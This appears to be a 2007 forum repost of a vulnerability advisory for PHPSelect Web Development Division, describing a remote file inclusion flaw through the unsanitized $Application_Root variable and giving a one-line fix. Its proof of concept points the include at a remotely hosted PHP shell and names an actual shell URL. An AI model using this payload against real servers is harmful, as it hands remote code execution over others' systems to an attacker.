Ras Posted June 17, 2007 Report Posted June 17, 2007 +-------------------------------------------------------------------+ PHPSelect Web Development Division <= Remote File Inclusion++--------------------------------------------------------------------++ Affected Software .: PHPSelect Web Development Division+ Venedor ...........: [url]http://www.phpselect.com/[/url]+ Class .............: Remote File Inclusion+ Risk ..............: high (Remote File Execution)+ Found by ..........: rUnViRuS+ Original advisory .: [url]http://www.wdzone.net/[/url] [url]http://www.worlddefacers.de/[/url]+ Contact ...........: stormhacker[at]hotmail[.]com++--------------------------------------------------------------------++ Code index.php3:++ .....+ include("$Application_Root/modules/include/global_settings");+ .....++--------------------------------------------------------------------++ $Application_Root is not properly sanitized before being used.+ The bug is in the "PDD" Package for PHPSelect Web Development Division.++--------------------------------------------------------------------++ Solution:+ Add this line to your php-file:++ $Application_Root ="user/dir" //Your root path++--------------------------------------------------------------------+ PoC:+ Place a PHPShell on a remote location:+ [url]http://wdzone.net/sh.txt?[/url]++[url]http://[target]/index.php3?Application_Root=http://phpshell[/url]++-------------------------------------------------------------------- Quote
